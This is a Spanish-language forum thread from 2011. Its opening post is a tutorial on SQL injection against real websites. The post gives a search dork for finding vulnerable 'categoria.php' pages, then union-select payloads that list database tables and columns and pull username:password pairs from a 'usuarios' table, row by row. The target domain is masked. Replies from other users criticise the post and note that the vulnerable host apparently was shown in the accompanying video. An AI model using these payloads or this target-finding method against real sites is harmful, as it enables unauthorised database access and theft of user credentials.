Título: sqli+bug+exploit=videotuto Publicado por: ruben_linux en 25 Agosto 2011, 23:47 pm Saludos a todos. Soy ruben_linux, voy enseñar como hago SQLi
1.- buscamos victima. inurl:software/categoria.php? 2.- exploit +and+1=0 3.- buscamos union select Citar http://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+1-- 4.- buscamos las tablas Citar http://www.xxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables-- 5.- buscamos las columnas Citar http://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns-- 6.- le pedimos que nos muestre el nick y la pass de la tabla usuarios. Citar http://www.xxxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+concat_ws(char(58),nick,PASSWORD)+from+usuarios+limit+0,1-- vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:passpodemos buscar más tablas, y más columnas, aquí solo muestro una pantalla pero se pueden sacar más. uuEbGos9Cwg Título: Re: sqli+bug+exploit=videotuto Publicado por: Shell Root en 26 Agosto 2011, 00:18 am 1. No tiene nada de nuevo.
2. No creo que sea necesario ponerle el hosting. 3. ... Título: Re: sqli+bug+exploit=videotuto Publicado por: lipman en 26 Agosto 2011, 00:31 am Interesante.. pero dejame decirte que creo que no está permitido publicar la web vulnerable cuando se hacen este tipo de cosas.
De todos modos, no es que esté muy explicado que digamos =/ Título: Re: sqli+bug+exploit=videotuto Publicado por: WarGhost en 26 Agosto 2011, 02:54 am A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió. ;-)
Título: Re: sqli+bug+exploit=videotuto Publicado por: ruben_linux en 26 Agosto 2011, 13:05 pm A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió. ;-) Gracias WarGhost. Ya lo cambie. |